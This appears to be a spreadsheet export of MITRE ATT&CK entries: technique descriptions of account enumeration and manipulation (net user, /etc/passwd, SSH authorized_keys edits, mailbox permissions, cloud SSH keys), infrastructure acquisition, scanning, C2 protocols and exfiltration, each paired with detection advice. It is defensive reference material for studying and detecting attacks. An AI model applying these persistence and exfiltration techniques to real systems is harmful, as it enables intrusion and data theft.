Commands such as &lt;code&gt;net user&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility and &lt;code&gt;id&lt;/code&gt; and &lt;code&gt;groups&lt;/code&gt;on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the &lt;code&gt;/etc/passwd&lt;/code&gt; file.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/001</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: Process Creation</t>
  </si>
  <si>
    <t>Daniel Stepanic, Elastic</t>
  </si>
  <si>
    <t>T1098</t>
  </si>
  <si>
    <t>Account Manipulation</t>
  </si>
  <si>
    <t>Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)
Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.
Monitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Linux, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Modification, Group: Group Modification, Process: Process Creation, User Account: User Account Modification</t>
  </si>
  <si>
    <t>Jannie Li, Microsoft Threat Intelligence Center (MSTIC); Praetorian; Tim MalcomVetter</t>
  </si>
  <si>
    <t>T1098.003</t>
  </si>
  <si>
    <t>Account Manipulation: Add Office 365 Global Administrator Role</t>
  </si>
  <si>
    <t>An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant.(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role.(Citation: Microsoft O365 Admin Roles) 
This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/003</t>
  </si>
  <si>
    <t>19 January 2020</t>
  </si>
  <si>
    <t>24 March 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Collect usage logs from cloud administrator accounts to identify unusual activity in the assignment of roles to those accounts. Monitor for accounts assigned to admin roles that go over a certain threshold of known admins. </t>
  </si>
  <si>
    <t>Office 365</t>
  </si>
  <si>
    <t>User Account: User Account Modification</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>T1098.001</t>
  </si>
  <si>
    <t>Account Manipulation: Additional Cloud Credentials</t>
  </si>
  <si>
    <t>Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the &lt;code&gt;CreateKeyPair&lt;/code&gt; or &lt;code&gt;ImportKeyPair&lt;/code&gt; API in AWS or the &lt;code&gt;gcloud compute os-login ssh-keys add&lt;/code&gt; command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/001</t>
  </si>
  <si>
    <t>08 March 2021</t>
  </si>
  <si>
    <t>Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
Monitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.</t>
  </si>
  <si>
    <t>Azure AD, IaaS</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, User Account: User Account Modification</t>
  </si>
  <si>
    <t>Expel; Jannie Li, Microsoft Threat Intelligence Center (MSTIC); Oleg Kolesnikov, Securonix</t>
  </si>
  <si>
    <t>T1098.002</t>
  </si>
  <si>
    <t>Account Manipulation: Exchange Email Delegate Permissions</t>
  </si>
  <si>
    <t>Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The &lt;code&gt;Add-MailboxPermission&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)
This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/002</t>
  </si>
  <si>
    <t>Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.
A larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.</t>
  </si>
  <si>
    <t>Group: Group Modification, User Account: User Account Modification</t>
  </si>
  <si>
    <t>Jannie Li, Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>T1098.004</t>
  </si>
  <si>
    <t>Account Manipulation: SSH Authorized Keys</t>
  </si>
  <si>
    <t>Adversaries may modify the SSH &lt;code&gt;authorized_keys&lt;/code&gt; file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The &lt;code&gt;authorized_keys&lt;/code&gt; file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under &lt;code&gt;&amp;lt;user-home&amp;gt;/.ssh/authorized_keys&lt;/code&gt;.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.
Adversaries may modify SSH &lt;code&gt;authorized_keys&lt;/code&gt; files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/004</t>
  </si>
  <si>
    <t>Use file integrity monitoring to detect changes made to the &lt;code&gt;authorized_keys&lt;/code&gt; file for each user on a system. Monitor for suspicious processes modifying the &lt;code&gt;authorized_keys&lt;/code&gt; file.
Monitor for changes to and suspicious processes modifiying &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1583</t>
  </si>
  <si>
    <t>Acquire Infrastructure</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.
Use of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583</t>
  </si>
  <si>
    <t>30 September 2020</t>
  </si>
  <si>
    <t>15 April 2021</t>
  </si>
  <si>
    <t>Resource Development</t>
  </si>
  <si>
    <t>Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. Much of this activity may take place outside the visibility of the target organization, making detection of this behavior difficult.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>PRE</t>
  </si>
  <si>
    <t>T1583.005</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Botnet</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/005</t>
  </si>
  <si>
    <t>01 October 2020</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).</t>
  </si>
  <si>
    <t>T1583.002</t>
  </si>
  <si>
    <t>Acquire Infrastructure: DNS Server</t>
  </si>
  <si>
    <t>Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/002</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>T1583.001</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Domains</t>
  </si>
  <si>
    <t>Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
Adversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/001</t>
  </si>
  <si>
    <t>Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.</t>
  </si>
  <si>
    <t>Deloitte Threat Library Team; Vinayak Wadhwa, Lucideus; Wes Hurd</t>
  </si>
  <si>
    <t>T1583.004</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Server</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.
Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/004</t>
  </si>
  <si>
    <t>T1583.003</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Virtual Private Server</t>
  </si>
  <si>
    <t>Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/003</t>
  </si>
  <si>
    <t>T1583.006</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Web Services</t>
  </si>
  <si>
    <t>Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/006</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).</t>
  </si>
  <si>
    <t>T1595</t>
  </si>
  <si>
    <t>Active Scanning</t>
  </si>
  <si>
    <t>Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting)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</si>
  <si>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https://attack.mitre.org/techniques/T1595</t>
  </si>
  <si>
    <t>02 October 2020</t>
  </si>
  <si>
    <t>Reconnaissance</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.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</si>
  <si>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Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1595.001</t>
  </si>
  <si>
    <t>Active Scanning: Scanning IP Blocks</t>
  </si>
  <si>
    <t>Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan)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[External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1595/001</t>
  </si>
  <si>
    <t>Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).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</si>
  <si>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Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1595.002</t>
  </si>
  <si>
    <t>Active Scanning: Vulnerability Scanning</t>
  </si>
  <si>
    <t>Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans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[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1595/002</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>Application Layer Protocol</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071</t>
  </si>
  <si>
    <t>Command And Control</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1071.004</t>
  </si>
  <si>
    <t>Application Layer Protocol: DNS</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/004</t>
  </si>
  <si>
    <t>15 March 2020</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</si>
  <si>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
Monitor for DNS traffic to/from known-bad or suspicious domains.</t>
  </si>
  <si>
    <t>Jan Petrov, Citi</t>
  </si>
  <si>
    <t>T1071.002</t>
  </si>
  <si>
    <t>Application Layer Protocol: File Transfer Protocols</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as FTP, FTPS, and TFTP that transfer files may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/002</t>
  </si>
  <si>
    <t>21 August 2020</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</si>
  <si>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used.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>T1071.003</t>
  </si>
  <si>
    <t>Application Layer Protocol: Mail Protocols</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/003</t>
  </si>
  <si>
    <t>T1071.001</t>
  </si>
  <si>
    <t>Application Layer Protocol: Web Protocols</t>
  </si>
  <si>
    <t xml:space="preserve">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Protocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1071/001</t>
  </si>
  <si>
    <t xml:space="preserve">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
Monitor for web traffic to/from known-bad or suspicious domains. </t>
  </si>
  <si>
    <t>T1010</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1010</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</si>
  <si>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</si>
  <si>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Command: Command Execution, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1560</t>
  </si>
  <si>
    <t>Archive Collected Data</t>
  </si>
  <si>
    <t>An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560</t>
  </si>
  <si>
    <t>20 February 2020</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.
Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1560.003</t>
  </si>
  <si>
    <t>Archive Collected Data: Archive via Custom Method</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560/003</t>
  </si>
  <si>
    <t>Custom archival methods can be very difficult to detect, since many of them use standard programming language concepts, such as bitwise operations.</t>
  </si>
  <si>
    <t>File: File Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1560.002</t>
  </si>
  <si>
    <t>Archive Collected Data: Archive via Library</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560/002</t>
  </si>
  <si>
    <t>Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)</t>
  </si>
  <si>
    <t>T1560.001</t>
  </si>
  <si>
    <t>Archive Collected Data: Archive via Utility</t>
  </si>
  <si>
    <t>An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data.
Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1560/001</t>
  </si>
  <si>
    <t>Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Process: Process Creation</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1123</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</si>
  <si>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microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.</t>
  </si>
  <si>
    <t>T1119</t>
  </si>
  <si>
    <t>Automated Collection</t>
  </si>
  <si>
    <t>Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. 
This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1119</t>
  </si>
  <si>
    <t>Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior.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t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Script: Script Execution</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. 
When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1020</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.</t>
  </si>
  <si>
    <t>Linux, Network, Windows, macOS</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Script: Script Execution</t>
  </si>
  <si>
    <t>ExtraHop</t>
  </si>
  <si>
    <t>T1020.001</t>
  </si>
  <si>
    <t>Automated Exfiltration: Traffic Duplication</t>
  </si>
  <si>
    <t>Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure.  Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring)
Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1020/001</t>
  </si>
  <si>
